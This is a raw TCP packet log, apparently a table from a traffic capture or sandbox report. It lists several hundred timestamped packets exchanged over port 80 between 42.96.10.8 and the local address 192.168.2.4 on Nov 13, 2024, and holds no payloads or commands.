                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058526993 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058537006 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058546066 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058556080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058567047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058578014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058583021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058588028 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058599949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058774948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058774948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058774948 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058937073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058948040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058957100 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058967113 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058976889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058985949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.058996916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059006929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059017897 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059027910 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059031010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059031010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059037924 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059046984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059056997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059063911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059063911 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059066057 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059119940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059119940 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059161901 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059173107 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059182882 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059195042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059211016 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059247971 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059257984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059267998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059277058 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059288979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059288979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059345961 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059459925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059469938 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059478045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059489012 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059499025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059504032 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059510946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059533119 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059542894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059545040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059545040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059552908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059562922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059572935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059582949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059593916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059595108 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059595108 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059602976 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059613943 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059623957 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059628010 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059633017 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059643984 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059653997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059654951 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059664011 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059674025 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059684038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059695005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059705019 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059710979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059710979 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059715033 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059756994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059756994 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059880018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059890032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059899092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059910059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059920073 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059931040 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059936047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059936047 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.059988022 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060072899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060084105 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060094118 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060103893 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060113907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060137033 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060137987 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060209036 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060219049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060229063 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060254097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060254097 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060256958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060272932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060283899 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060293913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060303926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060317993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060317993 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060328007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060343027 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060364008 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060370922 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060381889 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060390949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060404062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060414076 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060417891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060417891 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060424089 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060434103 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060446024 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060456038 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060480118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060480118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060884953 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060897112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060905933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060935974 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.060996056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061002970 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061013937 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061022997 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061033964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061077118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061077118 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061088085 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061099052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061108112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061119080 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061129093 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061153889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061153889 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061286926 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061297894 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061307907 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061321020 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061331034 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061336040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061341047 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061352015 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061357975 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061361074 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061372042 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061376095 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061382055 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061394930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061409950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061409950 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061419964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061429977 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061439037 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061450005 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061453104 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061460018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061466932 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061470032 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061480999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061494112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061501026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061501026 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061502934 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061558962 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061569929 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061578989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061589956 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061593056 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061599016 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061615944 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061655998 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061671019 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061671972 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061681986 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061691999 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061702013 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061722040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061722040 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061858892 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061868906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061877966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061888933 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061898947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061923027 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061923981 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061928988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061939955 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061964035 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061974049 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061980009 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.061984062 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062000036 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062001944 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062016964 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062027931 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062031031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062031031 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062036991 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062046051 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062056065 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062071085 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062081099 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062089920 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062098980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062108994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062112093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062112093 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062119007 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062129021 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062139988 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062149048 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062159061 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062161922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062161922 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062175989 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062213898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062232018 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062242031 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062252045 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062263966 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062287092 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062295914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062295914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062297106 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062305927 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062314987 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062326908 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062335014 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062340975 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062346935 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062356949 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062361002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062361002 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062367916 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062380075 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062381029 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062414885 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062426090 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062436104 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062458992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062458992 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062459946 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062470913 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062479973 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062505007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062505007 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062684059 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062695980 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062705994 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062716961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062726021 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062727928 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062748909 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062835932 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062845945 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062854052 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062881947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062881947 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062966108 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062974930 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.062983990 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063000917 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063014030 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063021898 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063030958 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063041925 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063051939 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063062906 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063074112 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063083887 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063092947 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063102961 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063103914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063103914 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063112974 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063119888 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063131094 CET4973380192.168.2.442.96.10.8
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063148022 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063158989 CET804973342.96.10.8192.168.2.4
                                                                                                                                                                                                            Nov 13, 2024 13:25:23.063168049 CET804973342.96.10.8192.168.2.4
